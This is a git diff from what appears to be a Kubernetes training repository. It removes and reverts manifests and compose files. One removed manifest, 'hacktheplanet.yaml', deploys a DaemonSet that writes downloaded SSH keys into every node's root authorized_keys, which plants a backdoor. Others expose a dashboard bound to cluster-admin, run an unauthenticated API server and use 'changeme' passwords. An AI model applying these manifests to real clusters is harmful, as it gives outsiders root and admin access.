fix-redirects.sh: adding forced redirect

Bump:
- stern
- Ubuntu

Also, each place where there is a 'bumpable' version, I added
a ##VERSION## marker, easily greppable.

README.md

@@ -39,7 +39,7 @@ your own tutorials.
 All these materials have been gathered in a single repository
 because they have a few things in common:
 
-- some [shared slides](slides/shared/) that are re-used
+- some [common slides](slides/common/) that are re-used
   (and updated) identically between different decks;
 - a [build system](slides/) generating HTML slides from
   Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
   locked-down computer, host firewall, etc.
 - Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
   can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
-  prevent you from losing your place if you get disconnected from servers.
+  prevent you from loosing your place if you get disconnected from servers.
   https://tmux.github.io
 - Forget to print "cards" and cut them up for handing out IP's.
 - Forget to have fun and focus on your students!

compose/frr-route-reflector/conf/bgpd.conf

@@ -1,9 +0,0 @@
-hostname frr
-router bgp 64512
-network 1.0.0.2/32
-bgp log-neighbor-changes
-neighbor kube peer-group
-neighbor kube remote-as 64512
-neighbor kube route-reflector-client
-bgp listen range 0.0.0.0/0 peer-group kube
-log stdout

compose/frr-route-reflector/conf/zebra.conf

@@ -1,2 +0,0 @@
-hostname frr
-log stdout

compose/frr-route-reflector/docker-compose.yaml

@@ -1,34 +0,0 @@
-version: "3"
-
-services:
-  bgpd:
-    image: ajones17/frr:662
-    volumes:
-    - ./conf:/etc/frr
-    - ./run:/var/run/frr
-    network_mode: host
-    entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
-    restart: always
-
-  zebra:
-    image: ajones17/frr:662
-    volumes:
-    - ./conf:/etc/frr
-    - ./run:/var/run/frr
-    network_mode: host
-    entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
-    restart: always
-
-  vtysh:
-    image: ajones17/frr:662
-    volumes:
-    - ./conf:/etc/frr
-    - ./run:/var/run/frr
-    network_mode: host
-    entrypoint: vtysh -c "show ip bgp"
-
-  chmod:
-    image: alpine
-    volumes:
-    - ./run:/var/run/frr
-    command: chmod 777 /var/run/frr

compose/kube-router-k8s-control-plane/docker-compose.yaml

@@ -1,29 +0,0 @@
-version: "3"
-
-services:
-
-  pause:
-    ports:
-    - 8080:8080
-    image: k8s.gcr.io/pause
-
-  etcd:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/etcd:3.3.10
-    command: etcd
-
-  kube-apiserver:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
-
-  kube-controller-manager:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
-    "Edit the CLUSTER placeholder first. Then, remove this line.":
-    
-  kube-scheduler:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-scheduler --master http://localhost:8080

compose/kube-router-k8s-control-plane/kuberouter.yaml

@@ -1,128 +0,0 @@
----
-apiVersion: |+
-
-
-  Make sure you update the line with --master=http://X.X.X.X:8080 below.
-  Then remove this section from this YAML file and try again.
-
----
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: kube-router-cfg
-  namespace: kube-system
-  labels:
-    tier: node
-    k8s-app: kube-router
-data:
-  cni-conf.json: |
-    {
-       "cniVersion":"0.3.0",
-       "name":"mynet",
-       "plugins":[
-          {
-             "name":"kubernetes",
-             "type":"bridge",
-             "bridge":"kube-bridge",
-             "isDefaultGateway":true,
-             "ipam":{
-                "type":"host-local"
-             }
-          }
-       ]
-    }
----
-apiVersion: extensions/v1beta1
-kind: DaemonSet
-metadata:
-  labels:
-    k8s-app: kube-router
-    tier: node
-  name: kube-router
-  namespace: kube-system
-spec:
-  template:
-    metadata:
-      labels:
-        k8s-app: kube-router
-        tier: node
-      annotations:
-        scheduler.alpha.kubernetes.io/critical-pod: ''
-    spec:
-      serviceAccountName: kube-router
-      containers:
-      - name: kube-router
-        image: docker.io/cloudnativelabs/kube-router
-        imagePullPolicy: Always
-        args:
-        - "--run-router=true"
-        - "--run-firewall=true"
-        - "--run-service-proxy=true"
-        - "--master=http://X.X.X.X:8080"
-        env:
-        - name: NODE_NAME
-          valueFrom:
-            fieldRef:
-              fieldPath: spec.nodeName
-        - name: KUBE_ROUTER_CNI_CONF_FILE
-          value: /etc/cni/net.d/10-kuberouter.conflist
-        livenessProbe:
-          httpGet:
-            path: /healthz
-            port: 20244
-          initialDelaySeconds: 10
-          periodSeconds: 3
-        resources:
-          requests:
-            cpu: 250m
-            memory: 250Mi
-        securityContext:
-          privileged: true
-        volumeMounts:
-        - name: lib-modules
-          mountPath: /lib/modules
-          readOnly: true
-        - name: cni-conf-dir
-          mountPath: /etc/cni/net.d
-      initContainers:
-      - name: install-cni
-        image: busybox
-        imagePullPolicy: Always
-        command:
-        - /bin/sh
-        - -c
-        - set -e -x;
-          if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
-            if [ -f /etc/cni/net.d/*.conf ]; then
-              rm -f /etc/cni/net.d/*.conf;
-            fi;
-            TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
-            cp /etc/kube-router/cni-conf.json ${TMP};
-            mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
-          fi
-        volumeMounts:
-        - mountPath: /etc/cni/net.d
-          name: cni-conf-dir
-        - mountPath: /etc/kube-router
-          name: kube-router-cfg
-      hostNetwork: true
-      tolerations:
-      - key: CriticalAddonsOnly
-        operator: Exists
-      - effect: NoSchedule
-        key: node-role.kubernetes.io/master
-        operator: Exists
-      - effect: NoSchedule
-        key: node.kubernetes.io/not-ready
-        operator: Exists
-      volumes:
-      - name: lib-modules
-        hostPath:
-          path: /lib/modules
-      - name: cni-conf-dir
-        hostPath:
-          path: /etc/cni/net.d
-      - name: kube-router-cfg
-        configMap:
-          name: kube-router-cfg
-

compose/simple-k8s-control-plane/docker-compose.yaml

@@ -1,28 +0,0 @@
-version: "3"
-
-services:
-
-  pause:
-    ports:
-    - 8080:8080
-    image: k8s.gcr.io/pause
-
-  etcd:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/etcd:3.3.10
-    command: etcd
-
-  kube-apiserver:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
-
-  kube-controller-manager:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-controller-manager --master http://localhost:8080
-    
-  kube-scheduler:
-    network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
-    command: kube-scheduler --master http://localhost:8080

dockercoins/hasher/Dockerfile

@@ -5,3 +5,6 @@ RUN gem install thin
 ADD hasher.rb /
 CMD ["ruby", "hasher.rb"]
 EXPOSE 80
+HEALTHCHECK \
+  --interval=1s --timeout=2s --retries=3 --start-period=1s \
+  CMD curl http://localhost/ || exit 1

elk/docker-compose.yml

@@ -2,14 +2,14 @@ version: "2"
 
 services:
   elasticsearch:
-    image: elasticsearch:2
+    image: elasticsearch
     # If you need to access ES directly, just uncomment those lines.
     #ports:
     #  - "9200:9200"
     #  - "9300:9300"
 
   logstash:
-    image: logstash:2
+    image: logstash
     command: |
       -e '
       input {
@@ -47,7 +47,7 @@ services:
       - "12201:12201/udp"
 
   kibana:
-    image: kibana:4
+    image: kibana
     ports:
       - "5601:5601"
     environment:

k8s/consul.yaml

@@ -1,37 +1,3 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: consul
-  labels:
-    app: consul
-rules:
-  - apiGroups: [""]
-    resources:
-      - pods
-    verbs:
-      - get
-      - list
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRoleBinding
-metadata:
-  name: consul
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: consul
-subjects:
-  - kind: ServiceAccount
-    name: consul
-    namespace: default
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: consul
-  labels:
-    app: consul
----
 apiVersion: v1
 kind: Service
 metadata:
@@ -58,7 +24,6 @@ spec:
       labels:
         app: consul
     spec:
-      serviceAccountName: consul
       affinity:
         podAntiAffinity:
           requiredDuringSchedulingIgnoredDuringExecution:
@@ -72,11 +37,18 @@ spec:
       terminationGracePeriodSeconds: 10
       containers:
         - name: consul
-          image: "consul:1.4.4"
+          image: "consul:1.2.2"
+          env:
+            - name: NAMESPACE
+              valueFrom:
+                fieldRef:
+                  fieldPath: metadata.namespace
           args:
             - "agent"
             - "-bootstrap-expect=3"
-            - "-retry-join=provider=k8s label_selector=\"app=consul\""
+            - "-retry-join=consul-0.consul.$(NAMESPACE).svc.cluster.local"
+            - "-retry-join=consul-1.consul.$(NAMESPACE).svc.cluster.local"
+            - "-retry-join=consul-2.consul.$(NAMESPACE).svc.cluster.local"
             - "-client=0.0.0.0"
             - "-data-dir=/consul/data"
             - "-server"

k8s/efk.yaml

@@ -3,6 +3,7 @@ apiVersion: v1
 kind: ServiceAccount
 metadata:
   name: fluentd
+
 ---
 apiVersion: rbac.authorization.k8s.io/v1beta1
 kind: ClusterRole
@@ -18,6 +19,7 @@ rules:
   - get
   - list
   - watch
+
 ---
 kind: ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -31,18 +33,23 @@ subjects:
 - kind: ServiceAccount
   name: fluentd
   namespace: default
+
 ---
 apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
   name: fluentd
   labels:
-    app: fluentd
+    k8s-app: fluentd-logging
+    version: v1
+    kubernetes.io/cluster-service: "true"
 spec:
   template:
     metadata:
       labels:
-        app: fluentd
+        k8s-app: fluentd-logging
+        version: v1
+        kubernetes.io/cluster-service: "true"
     spec:
       serviceAccount: fluentd
       serviceAccountName: fluentd
@@ -51,7 +58,7 @@ spec:
         effect: NoSchedule
       containers:
       - name: fluentd
-        image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
+        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
         env:
           - name:  FLUENT_ELASTICSEARCH_HOST
             value: "elasticsearch"
@@ -59,12 +66,14 @@ spec:
             value: "9200"
           - name: FLUENT_ELASTICSEARCH_SCHEME
             value: "http"
+          # X-Pack Authentication
+          # =====================
+          - name: FLUENT_ELASTICSEARCH_USER
+            value: "elastic"
+          - name: FLUENT_ELASTICSEARCH_PASSWORD
+            value: "changeme"
           - name: FLUENT_UID
             value: "0"
-          - name: FLUENTD_SYSTEMD_CONF
-            value: "disable"
-          - name: FLUENTD_PROMETHEUS_CONF
-            value: "disable"
         resources:
           limits:
             memory: 200Mi
@@ -85,83 +94,134 @@ spec:
       - name: varlibdockercontainers
         hostPath:
           path: /var/lib/docker/containers
+
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
+  annotations:
+    deployment.kubernetes.io/revision: "1"
+  creationTimestamp: null
+  generation: 1
   labels:
-    app: elasticsearch
+    run: elasticsearch
   name: elasticsearch
+  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
 spec:
+  progressDeadlineSeconds: 600
+  replicas: 1
+  revisionHistoryLimit: 10
   selector:
     matchLabels:
-      app: elasticsearch
+      run: elasticsearch
+  strategy:
+    rollingUpdate:
+      maxSurge: 1
+      maxUnavailable: 1
+    type: RollingUpdate
   template:
     metadata:
+      creationTimestamp: null
       labels:
-        app: elasticsearch
+        run: elasticsearch
     spec:
       containers:
-      - image: elasticsearch:5
+      - image: elasticsearch:5.6.8
+        imagePullPolicy: IfNotPresent
         name: elasticsearch
-        resources:
-          limits:
-            memory: 2Gi
-          requests:
-            memory: 1Gi
+        resources: {}
+        terminationMessagePath: /dev/termination-log
+        terminationMessagePolicy: File
         env:
         - name: ES_JAVA_OPTS
           value: "-Xms1g -Xmx1g"
+      dnsPolicy: ClusterFirst
+      restartPolicy: Always
+      schedulerName: default-scheduler
+      securityContext: {}
+      terminationGracePeriodSeconds: 30
+
 ---
 apiVersion: v1
 kind: Service
 metadata:
+  creationTimestamp: null
   labels:
-    app: elasticsearch
+    run: elasticsearch
   name: elasticsearch
+  selfLink: /api/v1/namespaces/default/services/elasticsearch
 spec:
   ports:
   - port: 9200
     protocol: TCP
     targetPort: 9200
   selector:
-    app: elasticsearch
+    run: elasticsearch
+  sessionAffinity: None
   type: ClusterIP
+
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
+  annotations:
+    deployment.kubernetes.io/revision: "1"
+  creationTimestamp: null
+  generation: 1
   labels:
-    app: kibana
+    run: kibana
   name: kibana
+  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
 spec:
+  progressDeadlineSeconds: 600
+  replicas: 1
+  revisionHistoryLimit: 10
   selector:
     matchLabels:
-      app: kibana
+      run: kibana
+  strategy:
+    rollingUpdate:
+      maxSurge: 1
+      maxUnavailable: 1
+    type: RollingUpdate
   template:
     metadata:
+      creationTimestamp: null
       labels:
-        app: kibana
+        run: kibana
     spec:
       containers:
       - env:
         - name: ELASTICSEARCH_URL
           value: http://elasticsearch:9200/
-        image: kibana:5
+        image: kibana:5.6.8
+        imagePullPolicy: Always
         name: kibana
         resources: {}
+        terminationMessagePath: /dev/termination-log
+        terminationMessagePolicy: File
+      dnsPolicy: ClusterFirst
+      restartPolicy: Always
+      schedulerName: default-scheduler
+      securityContext: {}
+      terminationGracePeriodSeconds: 30
+
 ---
 apiVersion: v1
 kind: Service
 metadata:
+  creationTimestamp: null
   labels:
-    app: kibana
+    run: kibana
   name: kibana
+  selfLink: /api/v1/namespaces/default/services/kibana
 spec:
+  externalTrafficPolicy: Cluster
   ports:
   - port: 5601
     protocol: TCP
     targetPort: 5601
   selector:
-    app: kibana
+    run: kibana
+  sessionAffinity: None
   type: NodePort

k8s/elasticsearch-cluster.yaml

@@ -1,21 +0,0 @@
-apiVersion: enterprises.upmc.com/v1
-kind: ElasticsearchCluster
-metadata:
-  name: es
-spec:
-  kibana:
-    image: docker.elastic.co/kibana/kibana-oss:6.1.3
-    image-pull-policy: Always
-  cerebro:
-    image: upmcenterprises/cerebro:0.7.2
-    image-pull-policy: Always
-  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
-  image-pull-policy: Always
-  client-node-replicas: 2
-  master-node-replicas: 3
-  data-node-replicas: 3
-  network-host: 0.0.0.0
-  use-ssl: false
-  data-volume-size: 10Gi
-  java-options: "-Xms512m -Xmx512m"
-

k8s/elasticsearch-operator.yaml

@@ -1,94 +0,0 @@
-# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
----
-apiVersion: v1
-kind: Namespace
-metadata:
-  name: elasticsearch-operator
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: elasticsearch-operator
-rules:
-- apiGroups: ["extensions"]
-  resources: ["deployments", "replicasets", "daemonsets"]
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["apiextensions.k8s.io"]
-  resources: ["customresourcedefinitions"]
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["storage.k8s.io"]
-  resources: ["storageclasses"]
-  verbs: ["get", "list", "create", "delete", "deletecollection"]
-- apiGroups: [""]
-  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"] 
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["batch"]
-  resources: ["cronjobs", "jobs"]
-  verbs: ["create", "get", "deletecollection", "delete"]
-- apiGroups: [""]
-  resources: ["pods"]
-  verbs: ["list", "get", "watch"]
-- apiGroups: ["apps"]
-  resources: ["statefulsets", "deployments"]
-  verbs: ["*"]
-- apiGroups: ["enterprises.upmc.com"]
-  resources: ["elasticsearchclusters"]
-  verbs: ["*"]
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: elasticsearch-operator
-subjects:
-- kind: ServiceAccount
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
----
-apiVersion: extensions/v1beta1
-kind: Deployment
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
-spec:
-  replicas: 1
-  template:
-    metadata:
-      labels:
-        name: elasticsearch-operator
-    spec:
-      containers:
-      - name: operator
-        image: upmcenterprises/elasticsearch-operator:0.2.0
-        imagePullPolicy: Always
-        env:
-        - name: NAMESPACE
-          valueFrom:
-            fieldRef:
-              fieldPath: metadata.namespace
-        ports:
-        - containerPort: 8000
-          name: http
-        livenessProbe:
-          httpGet:
-            path: /live
-            port: 8000
-          initialDelaySeconds: 10
-          timeoutSeconds: 10
-        readinessProbe:
-          httpGet:
-            path: /ready
-            port: 8000
-          initialDelaySeconds: 10
-          timeoutSeconds: 5
-      serviceAccount: elasticsearch-operator

k8s/filebeat.yaml

@@ -1,167 +0,0 @@
----
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: filebeat-config
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-data:
-  filebeat.yml: |-
-    filebeat.config:
-      inputs:
-        # Mounted `filebeat-inputs` configmap:
-        path: ${path.config}/inputs.d/*.yml
-        # Reload inputs configs as they change:
-        reload.enabled: false
-      modules:
-        path: ${path.config}/modules.d/*.yml
-        # Reload module configs as they change:
-        reload.enabled: false
-
-    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
-    #filebeat.autodiscover:
-    #  providers:
-    #    - type: kubernetes
-    #      hints.enabled: true
-
-    processors:
-      - add_cloud_metadata:
-
-    cloud.id: ${ELASTIC_CLOUD_ID}
-    cloud.auth: ${ELASTIC_CLOUD_AUTH}
-
-    output.elasticsearch:
-      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
-      username: ${ELASTICSEARCH_USERNAME}
-      password: ${ELASTICSEARCH_PASSWORD}
----
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: filebeat-inputs
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-data:
-  kubernetes.yml: |-
-    - type: docker
-      containers.ids:
-      - "*"
-      processors:
-        - add_kubernetes_metadata:
-            in_cluster: true
----
-apiVersion: extensions/v1beta1
-kind: DaemonSet
-metadata:
-  name: filebeat
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-spec:
-  template:
-    metadata:
-      labels:
-        k8s-app: filebeat
-    spec:
-      serviceAccountName: filebeat
-      terminationGracePeriodSeconds: 30
-      containers:
-      - name: filebeat
-        image: docker.elastic.co/beats/filebeat-oss:7.0.1
-        args: [
-          "-c", "/etc/filebeat.yml",
-          "-e",
-        ]
-        env:
-        - name: ELASTICSEARCH_HOST
-          value: elasticsearch-es.default.svc.cluster.local
-        - name: ELASTICSEARCH_PORT
-          value: "9200"
-        - name: ELASTICSEARCH_USERNAME
-          value: elastic
-        - name: ELASTICSEARCH_PASSWORD
-          value: changeme
-        - name: ELASTIC_CLOUD_ID
-          value:
-        - name: ELASTIC_CLOUD_AUTH
-          value:
-        securityContext:
-          runAsUser: 0
-          # If using Red Hat OpenShift uncomment this:
-          #privileged: true
-        resources:
-          limits:
-            memory: 200Mi
-          requests:
-            cpu: 100m
-            memory: 100Mi
-        volumeMounts:
-        - name: config
-          mountPath: /etc/filebeat.yml
-          readOnly: true
-          subPath: filebeat.yml
-        - name: inputs
-          mountPath: /usr/share/filebeat/inputs.d
-          readOnly: true
-        - name: data
-          mountPath: /usr/share/filebeat/data
-        - name: varlibdockercontainers
-          mountPath: /var/lib/docker/containers
-          readOnly: true
-      volumes:
-      - name: config
-        configMap:
-          defaultMode: 0600
-          name: filebeat-config
-      - name: varlibdockercontainers
-        hostPath:
-          path: /var/lib/docker/containers
-      - name: inputs
-        configMap:
-          defaultMode: 0600
-          name: filebeat-inputs
-      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
-      - name: data
-        hostPath:
-          path: /var/lib/filebeat-data
-          type: DirectoryOrCreate
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: filebeat
-subjects:
-- kind: ServiceAccount
-  name: filebeat
-  namespace: kube-system
-roleRef:
-  kind: ClusterRole
-  name: filebeat
-  apiGroup: rbac.authorization.k8s.io
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: filebeat
-  labels:
-    k8s-app: filebeat
-rules:
-- apiGroups: [""] # "" indicates the core API group
-  resources:
-  - namespaces
-  - pods
-  verbs:
-  - get
-  - watch
-  - list
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: filebeat
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
----

k8s/hacktheplanet.yaml

@@ -1,34 +0,0 @@
-apiVersion: apps/v1
-kind: DaemonSet
-metadata:
-  name: hacktheplanet
-spec:
-  selector:
-    matchLabels:
-      app: hacktheplanet
-  template:
-    metadata:
-      labels:
-        app: hacktheplanet
-    spec:
-      volumes:
-      - name: root
-        hostPath:
-          path: /root
-      tolerations:
-      - effect: NoSchedule
-        operator: Exists
-      initContainers:
-      - name: hacktheplanet
-        image: alpine
-        volumeMounts:
-        - name: root
-          mountPath: /root
-        command:
-        - sh
-        - -c
-        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
-      containers:
-      - name: web
-        image: nginx
-

k8s/insecure-dashboard.yaml

@@ -1,220 +0,0 @@
-# Copyright 2017 The Kubernetes Authors.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-# Configuration to deploy release version of the Dashboard UI compatible with
-# Kubernetes 1.8.
-#
-# Example usage: kubectl create -f <this_file>
-
-# ------------------- Dashboard Secret ------------------- #
-
-apiVersion: v1
-kind: Secret
-metadata:
-  labels:
-    k8s-app: kubernetes-dashboard
-  name: kubernetes-dashboard-certs
-  namespace: kube-system
-type: Opaque
-
----
-# ------------------- Dashboard Service Account ------------------- #
-
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  labels:
-    k8s-app: kubernetes-dashboard
-  name: kubernetes-dashboard
-  namespace: kube-system
-
----
-# ------------------- Dashboard Role & Role Binding ------------------- #
-
-kind: Role
-apiVersion: rbac.authorization.k8s.io/v1
-metadata:
-  name: kubernetes-dashboard-minimal
-  namespace: kube-system
-rules:
-  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
-- apiGroups: [""]
-  resources: ["secrets"]
-  verbs: ["create"]
-  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
-- apiGroups: [""]
-  resources: ["configmaps"]
-  verbs: ["create"]
-  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
-- apiGroups: [""]
-  resources: ["secrets"]
-  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
-  verbs: ["get", "update", "delete"]
-  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
-- apiGroups: [""]
-  resources: ["configmaps"]
-  resourceNames: ["kubernetes-dashboard-settings"]
-  verbs: ["get", "update"]
-  # Allow Dashboard to get metrics from heapster.
-- apiGroups: [""]
-  resources: ["services"]
-  resourceNames: ["heapster"]
-  verbs: ["proxy"]
-- apiGroups: [""]
-  resources: ["services/proxy"]
-  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
-  verbs: ["get"]
-
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: kubernetes-dashboard-minimal
-  namespace: kube-system
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: Role
-  name: kubernetes-dashboard-minimal
-subjects:
-- kind: ServiceAccount
-  name: kubernetes-dashboard
-  namespace: kube-system
-
----
-# ------------------- Dashboard Deployment ------------------- #
-
-kind: Deployment
-apiVersion: apps/v1beta2
-metadata:
-  labels:
-    k8s-app: kubernetes-dashboard
-  name: kubernetes-dashboard
-  namespace: kube-system
-spec:
-  replicas: 1
-  revisionHistoryLimit: 10
-  selector:
-    matchLabels:
-      k8s-app: kubernetes-dashboard
-  template:
-    metadata:
-      labels:
-        k8s-app: kubernetes-dashboard
-    spec:
-      containers:
-      - name: kubernetes-dashboard
-        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
-        ports:
-        - containerPort: 8443
-          protocol: TCP
-        args:
-          - --auto-generate-certificates
-          # Uncomment the following line to manually specify Kubernetes API server Host
-          # If not specified, Dashboard will attempt to auto discover the API server and connect
-          # to it. Uncomment only if the default does not work.
-          # - --apiserver-host=http://my-address:port
-        volumeMounts:
-        - name: kubernetes-dashboard-certs
-          mountPath: /certs
-          # Create on-disk volume to store exec logs
-        - mountPath: /tmp
-          name: tmp-volume
-        livenessProbe:
-          httpGet:
-            scheme: HTTPS
-            path: /
-            port: 8443
-          initialDelaySeconds: 30
-          timeoutSeconds: 30
-      volumes:
-      - name: kubernetes-dashboard-certs
-        secret:
-          secretName: kubernetes-dashboard-certs
-      - name: tmp-volume
-        emptyDir: {}
-      serviceAccountName: kubernetes-dashboard
-      # Comment the following tolerations if Dashboard must not be deployed on master
-      tolerations:
-      - key: node-role.kubernetes.io/master
-        effect: NoSchedule
-
----
-# ------------------- Dashboard Service ------------------- #
-
-kind: Service
-apiVersion: v1
-metadata:
-  labels:
-    k8s-app: kubernetes-dashboard
-  name: kubernetes-dashboard
-  namespace: kube-system
-spec:
-  ports:
-    - port: 443
-      targetPort: 8443
-  selector:
-    k8s-app: kubernetes-dashboard
----
-apiVersion: extensions/v1beta1
-kind: Deployment
-metadata:
-  labels:
-    app: dashboard
-  name: dashboard
-spec:
-  selector:
-    matchLabels:
-      app: dashboard
-  template:
-    metadata:
-      labels:
-        app: dashboard
-    spec:
-      containers:
-      - args:
-        - sh
-        - -c
-        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
-        image: alpine
-        name: dashboard
----
-apiVersion: v1
-kind: Service
-metadata:
-  labels:
-    app: dashboard
-  name: dashboard
-spec:
-  ports:
-  - port: 80
-    protocol: TCP
-    targetPort: 80
-  selector:
-    app: dashboard
-  type: NodePort
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: kubernetes-dashboard
-  labels:
-    k8s-app: kubernetes-dashboard
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: cluster-admin
-subjects:
-- kind: ServiceAccount
-  name: kubernetes-dashboard
-  namespace: kube-system

k8s/just-a-pod.yaml

@@ -1,10 +0,0 @@
-apiVersion: v1
-Kind: Pod
-metadata:
-  name: hello
-  namespace: default
-spec:
-  containers:
-  - name: hello
-    image: nginx
-

k8s/local-path-storage.yaml

@@ -1,110 +0,0 @@
-# This is a local copy of:
-# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
----
-apiVersion: v1
-kind: Namespace
-metadata:
-  name: local-path-storage
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: local-path-provisioner-service-account
-  namespace: local-path-storage
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: local-path-provisioner-role
-  namespace: local-path-storage
-rules:
-- apiGroups: [""]
-  resources: ["nodes", "persistentvolumeclaims"]
-  verbs: ["get", "list", "watch"]
-- apiGroups: [""]
-  resources: ["endpoints", "persistentvolumes", "pods"]
-  verbs: ["*"]
-- apiGroups: [""]
-  resources: ["events"]
-  verbs: ["create", "patch"]
-- apiGroups: ["storage.k8s.io"]
-  resources: ["storageclasses"]
-  verbs: ["get", "list", "watch"]
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: local-path-provisioner-bind
-  namespace: local-path-storage
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: local-path-provisioner-role
-subjects:
-- kind: ServiceAccount
-  name: local-path-provisioner-service-account
-  namespace: local-path-storage
----
-apiVersion: apps/v1beta2
-kind: Deployment
-metadata:
-  name: local-path-provisioner
-  namespace: local-path-storage
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: local-path-provisioner
-  template:
-    metadata:
-      labels:
-        app: local-path-provisioner
-    spec:
-      serviceAccountName: local-path-provisioner-service-account
-      containers:
-      - name: local-path-provisioner
-        image: rancher/local-path-provisioner:v0.0.8
-        imagePullPolicy: Always
-        command:
-        - local-path-provisioner
-        - --debug
-        - start
-        - --config
-        - /etc/config/config.json
-        volumeMounts:
-        - name: config-volume
-          mountPath: /etc/config/
-        env:
-        - name: POD_NAMESPACE
-          valueFrom:
-            fieldRef:
-              fieldPath: metadata.namespace
-      volumes:
-        - name: config-volume
-          configMap:
